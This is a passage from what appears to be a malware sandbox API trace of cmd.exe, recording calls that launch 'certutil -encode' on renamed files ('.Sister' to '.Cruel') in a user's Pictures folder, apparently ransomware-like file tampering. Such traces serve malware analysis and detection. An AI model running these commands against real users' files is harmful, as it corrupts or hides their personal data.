(_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0296.362] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0296.362] GetProcessHeap () returned 0x21ed8c70000 [0296.362] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0296.362] GetProcessHeap () returned 0x21ed8c70000 [0296.363] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95700 [0296.363] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0296.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.363] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0296.363] _get_osfhandle (_FileHandle=0) returned 0x4c [0296.363] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0296.364] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"DCw650z.bmp.Sister\" \"DCw650z.bmp.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"DCw650z.bmp.Sister\" \"DCw650z.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"DCw650z.bmp.Sister\" \"DCw650z.bmp.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x102c, dwThreadId=0xe10)) returned 1 [0296.377] CloseHandle (hObject=0xa4) returned 1 [0296.377] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0296.377] GetProcessHeap () returned 0x21ed8c70000 [0296.377] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0296.377] GetEnvironmentStringsW () returned 0x21ed8d44630* [0296.377] GetProcessHeap () returned 0x21ed8c70000 [0296.377] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0296.378] FreeEnvironmentStringsA (penv="=") returned 1 [0296.378] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0296.981] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0296.982] CloseHandle (hObject=0xa8) returned 1 [0296.982] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0296.982] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0296.982] GetProcessHeap () returned 0x21ed8c70000 [0296.982] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0296.982] GetEnvironmentStringsW () returned 0x21ed8d44630* [0296.982] GetProcessHeap () returned 0x21ed8c70000 [0296.982] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0296.982] FreeEnvironmentStringsA (penv="=") returned 1 [0296.982] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0296.982] GetProcessHeap () returned 0x21ed8c70000 [0296.982] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0296.983] GetEnvironmentStringsW () returned 0x21ed8d44630* [0296.983] GetProcessHeap () returned 0x21ed8c70000 [0296.983] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0296.983] FreeEnvironmentStringsA (penv="=") returned 1 [0296.983] GetProcessHeap () returned 0x21ed8c70000 [0296.983] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95700) returned 1 [0296.983] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0296.983] ??_V@YAXPEAX@Z () returned 0x1 [0296.983] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe6dbc0, ftCreationTime.dwHighDateTime=0x1d5e494, ftLastAccessTime.dwLowDateTime=0x9a5b1ab0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x9a5b1ab0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="E8sv92vO_xVbOO.jpg.Sister", cAlternateFileName="")) returned 1 [0296.983] GetProcessHeap () returned 0x21ed8c70000 [0296.983] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c670, Size=0x110) returned 0x21ed8c7c670 [0296.983] GetProcessHeap () returned 0x21ed8c70000 [0296.983] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c670) returned 0x110 [0296.983] GetProcessHeap () returned 0x21ed8c70000 [0296.983] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56390 [0296.983] GetProcessHeap () returned 0x21ed8c70000 [0296.983] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56390, Size=0x58) returned 0x21ed8d56390 [0296.984] GetProcessHeap () returned 0x21ed8c70000 [0296.984] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56390) returned 0x58 [0296.984] GetProcessHeap () returned 0x21ed8c70000 [0296.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56400 [0296.984] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0296.984] GetProcessHeap () returned 0x21ed8c70000 [0296.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7bc10 [0296.985] ??_V@YAXPEAX@Z () returned 0x1 [0296.985] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0296.985] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cf40 [0296.985] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0296.985] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cd00 [0296.985] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0296.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdb92d3b7, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdb92d3b7, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0296.986] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0296.986] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E8sv92vO_xVbOO.jpg.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe6dbc0, ftCreationTime.dwHighDateTime=0x1d5e494, ftLastAccessTime.dwLowDateTime=0x9a5b1ab0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0x9a5b1ab0, ftLastWriteTime.dwHighDateTime=0x1d5e348, nFileSizeHigh=0x0, nFileSizeLow=0x79a3, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="E8sv92vO_xVbOO.jpg.Sister", cAlternateFileName="E8SV92~1.SIS")) returned 0x21ed8c7cdc0 [0296.986] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0296.986] _wcsnicmp (_String1="E8SV92~1.SIS", _String2="E8sv92vO_xVbOO.jpg.Sister", _MaxCount=0x19) returned 8 [0296.986] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0296.986] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0296.986] GetProcessHeap () returned 0x21ed8c70000 [0296.986] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8810 [0296.986] ??_V@YAXPEAX@Z () returned 0x1 [0296.986] ??_V@YAXPEAX@Z () returned 0x1 [0296.987] GetProcessHeap () returned 0x21ed8c70000 [0296.987] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56400, Size=0x210) returned 0x21ed8d56400 [0296.987] GetProcessHeap () returned 0x21ed8c70000 [0296.987] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56400) returned 0x210 [0296.987] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0296.987] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.987] GetFileType (hFile=0x50) returned 0x2 [0296.987] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.987] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0296.988] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.988] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0296.995] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0296.995] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0296.995] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0296.995] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0296.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.995] GetFileType (hFile=0x50) returned 0x2 [0296.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.995] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0296.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.996] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0296.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.996] GetFileType (hFile=0x50) returned 0x2 [0296.996] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.996] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0296.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.997] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d563a0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d563a0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0296.997] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"E8sv92vO_xVbOO.jpg.Sister\" \"E8sv92vO_xVbOO.jpg.Cruel\" ") returned 64 [0296.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.997] GetFileType (hFile=0x50) returned 0x2 [0296.997] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.998] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0296.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.998] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x40, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x40) returned 1 [0296.998] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0296.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.998] GetFileType (hFile=0x50) returned 0x2 [0296.998] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0296.999] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0296.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0296.999] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0297.005] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0297.006] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0297.006] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0297.006] malloc (_Size=0xffce) returned 0x21eda100000 [0297.006] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0297.006] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0297.006] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0297.006] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0297.006] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0297.006] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0297.006] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0297.006] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0297.006] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0297.006] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0297.006] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0297.006] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0297.006] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0297.006] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0297.006] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0297.006] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0297.006] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0297.006] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0297.006] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0297.006] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0297.006] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0297.006] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0297.006] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0297.007] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0297.007] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0297.007] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0297.007] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0297.007] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0297.007] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0297.007] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0297.007] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0297.007] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0297.007] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0297.007] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0297.007] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0297.007] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0297.007] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0297.007] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0297.007] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0297.007] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0297.007] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0297.007] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0297.007] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0297.007] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0297.007] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0297.007] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0297.007] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0297.007] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0297.007] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0297.007] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0297.007] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0297.007] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0297.007] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0297.007] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0297.007] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0297.008] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0297.008] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0297.008] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0297.008] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0297.008] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0297.008] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0297.008] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0297.008] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0297.008] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0297.008] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0297.008] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0297.008] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0297.008] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0297.008] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0297.008] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0297.008] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0297.008] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0297.008] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0297.008] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0297.008] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0297.008] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0297.008] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0297.008] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0297.008] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0297.008] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0297.008] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0297.008] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0297.008] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0297.008] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0297.008] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0297.008] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0297.008] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0297.008] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0297.009] ??_V@YAXPEAX@Z () returned 0x1 [0297.009] GetProcessHeap () returned 0x21ed8c70000 [0297.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9390150 [0297.009] GetProcessHeap () returned 0x21ed8c70000 [0297.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa2) returned 0x21ed8c727b0 [0297.009] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0297.009] malloc (_Size=0xffce) returned 0x21eda100000 [0297.009] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0297.009] GetProcessHeap () returned 0x21ed8c70000 [0297.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8cc96e0 [0297.012] SetErrorMode (uMode=0x0) returned 0x0 [0297.012] SetErrorMode (uMode=0x1) returned 0x0 [0297.012] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8cc96f0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0297.012] SetErrorMode (uMode=0x0) returned 0x1 [0297.012] GetProcessHeap () returned 0x21ed8c70000 [0297.012] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc96e0, Size=0x54) returned 0x21ed8cc96e0 [0297.012] GetProcessHeap () returned 0x21ed8c70000 [0297.013] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc96e0) returned 0x54 [0297.013] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0297.013] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0297.013] GetProcessHeap () returned 0x21ed8c70000 [0297.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d64fa0 [0297.013] GetProcessHeap () returned 0x21ed8c70000 [0297.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d437f0 [0297.013] GetProcessHeap () returned 0x21ed8c70000 [0297.013] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d437f0, Size=0x1c0) returned 0x21ed8d65a40 [0297.013] GetProcessHeap () returned 0x21ed8c70000 [0297.013] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d65a40) returned 0x1c0 [0297.013] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0297.013] GetProcessHeap () returned 0x21ed8c70000 [0297.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c72860 [0297.013] GetProcessHeap () returned 0x21ed8c70000 [0297.013] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72860, Size=0x7e) returned 0x21ed8c72860 [0297.013] GetProcessHeap () returned 0x21ed8c70000 [0297.013] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72860) returned 0x7e [0297.013] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.013] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0297.015] GetLastError () returned 0x2 [0297.015] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.015] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0297.015] GetLastError () returned 0x2 [0297.015] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0297.015] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0297.015] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0297.016] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0297.016] GetLastError () returned 0x2 [0297.016] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0297.016] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0297.016] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0297.016] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0297.016] ??_V@YAXPEAX@Z () returned 0x1 [0297.016] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 